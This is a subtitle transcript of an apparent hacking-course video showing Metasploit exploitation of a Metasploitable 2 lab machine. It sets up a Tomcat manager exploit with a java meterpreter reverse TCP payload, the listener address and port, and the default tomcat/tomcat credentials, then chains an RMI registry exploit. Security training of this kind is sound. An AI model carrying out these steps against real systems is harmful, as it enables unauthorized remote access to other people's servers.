1
00:00:00,590 --> 00:00:02,660
Now, when you're finished with an exploit,

2
00:00:03,650 --> 00:00:08,630
you can pick another one directly by using the use command like this.

3
00:00:10,270 --> 00:00:16,270
Or you can use back and then utilize the new one by the use command.

4
00:00:17,710 --> 00:00:19,270
That's pretty much how I work.

5
00:00:20,270 --> 00:00:22,460
Then show the exploit options.

6
00:00:23,770 --> 00:00:28,870
Now, for this exploit, I will define a payload by setting the payload variable.

7
00:00:30,310 --> 00:00:33,250
set payload java/

8
00:00:34,270 --> 00:00:38,680
meterpreter/reverse_tcp.

9
00:00:40,860 --> 00:00:49,620
So I don't set the RHOST variable, but in the previous video, I defined it as a global variable.

10
00:00:51,360 --> 00:01:01,050
And also, there are some new variables under this payload section, LHOST and LPORT, because I chose

11
00:01:01,050 --> 00:01:03,090
a reverse TCP connection.

12
00:01:04,060 --> 00:01:09,640
Which means that after a successful exploitation, the target will connect back to me.

13
00:01:10,550 --> 00:01:21,270
So LHOST in this context is the IP address of Kali and LPORT is the port that is ready to connect

14
00:01:21,590 --> 00:01:22,160
to Kali.

15
00:01:23,240 --> 00:01:28,110
Its default value is four four four four, and I don't want to change that.

16
00:01:28,850 --> 00:01:33,430
I will only set the LHOST to 10.10.

17
00:01:33,470 --> 00:01:35,360
2.11.

18
00:01:36,480 --> 00:01:46,050
Then set HttpPassword to tomcat, set HttpUsername to tomcat.

19
00:01:47,210 --> 00:01:50,870
Now, it isn't necessary, but I can set the target to zero.

20
00:01:51,920 --> 00:01:58,670
Oh, I forgot the RPORT, so let's set the RPORT to 8180.

21
00:02:00,420 --> 00:02:02,490
OK, so let me check it one more time.

22
00:02:03,760 --> 00:02:05,220
OK, yeah, everything looks good.

23
00:02:06,580 --> 00:02:08,140
Now exploit.

24
00:02:09,920 --> 00:02:16,010
So it doesn't take too much time and I have the meterpreter session on Metasploitable 2.

25
00:02:17,880 --> 00:02:22,440
But this time, let's have a look at the user: tomcat55.

26
00:02:23,330 --> 00:02:25,220
It is not the root user.

27
00:02:25,990 --> 00:02:30,350
So this means actually you don't have a high-privileged shell.

28
00:02:31,160 --> 00:02:37,790
So I'm going to send this session to the background by using the meterpreter command.

29
00:02:39,220 --> 00:02:42,110
So this is my sessions list in the background.

30
00:02:42,910 --> 00:02:45,400
OK, so I want to show you a couple more commands:

31
00:02:46,630 --> 00:02:53,470
pushm and popm. pushm will push the current module to the stack.

32
00:02:54,160 --> 00:03:01,480
Now I will push this exploit to the stack, then I can pick another one: the RMI registry exploit.

33
00:03:02,780 --> 00:03:10,100
And I'll run it and I get another session. So as you can see here, I am working with the RMI registry

34
00:03:10,100 --> 00:03:19,610
exploit. With popm, I'll pop the last module from the stack, and it's the Tomcat manager exploit,

35
00:03:19,610 --> 00:03:21,650
as you see here on your screen.

36
00:03:21,860 --> 00:03:29,510
So I'll advise you to do this, because when you're doing some really quick exploitation, those last

37
00:03:29,510 --> 00:03:32,600
two commands come in super handy.

